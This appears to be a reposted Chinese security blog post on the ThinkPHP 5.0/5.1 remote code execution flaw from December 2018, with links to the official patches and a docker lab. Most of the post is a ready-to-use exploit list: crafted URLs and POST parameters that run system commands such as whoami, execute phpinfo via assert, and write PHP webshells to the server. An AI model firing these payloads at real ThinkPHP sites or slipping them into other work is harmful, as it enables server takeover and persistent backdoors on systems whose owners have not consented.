碼上快樂

相關內容    簡體    繁體

thinkphp5.x全版本任意代碼執行getshell

本文轉載自   查看原文   2019-09-23 17:27   1561    RCE/ web框架漏洞

ThinkPHP官方2018年12月9日發布重要的安全更新,修復了一個嚴重的遠程代碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒有進行足夠的檢測會導致在沒有開啟強制路由的情況下可能的getshell漏洞,受影響的版本包括5.0和5.1版本,推薦盡快更新到最新版本。

主要是因為”\“的錯誤

補丁:

Thinkphp v5.0.x補丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x補丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

環境地址:

docker漏洞環境源碼:https://github.com/vulnspy/thinkphp-5.1.29

漏洞利用

1.遠程命令執行exp:

http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

5.0.0~5.0.23xexp:

http://127.0.0.1/index.php?s=captcha

post_poc1:_method=__construct&filter[]=system&method=get&get[]=whoami
post_poc2:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

2.遠程代碼執行

http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 #執行代碼phpinfo()

http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert #5.1.x版本執行phpinfo()

http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  #5.1.x版本

http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()  #5.0.x版本

3.寫shell

http://127.0.0.1/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=***.php&vars[1][]=***
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>2.php

 thinkPHP-漏洞集合:https://blog.csdn.net/fly_hps/article/details/84956102

 包含:https://www.shuzhiduo.com/A/o75NEg6PJW/


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [漏洞分析]thinkphp 5.x全版本任意代碼執行分析全記錄 ThinkPHP5.x 任意代碼執行漏洞復現 Apache Solr 全版本任意讀取文件漏洞 wordpress<=4.6版本任意命令執行漏洞 ThinkPHP 2.x 任意代碼執行漏洞 復現與分析 ThinkPHP 2.x 任意代碼執行漏洞復現 ThinkPHP 5.0.x、5.1.x、5.2.x 全版本遠程命令執行漏洞 thinkphp5.x系列 RCE總結 ThinkPHP5.x注入漏洞學習 ThinkPHP5.x.x各版本實戰環境getshell
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM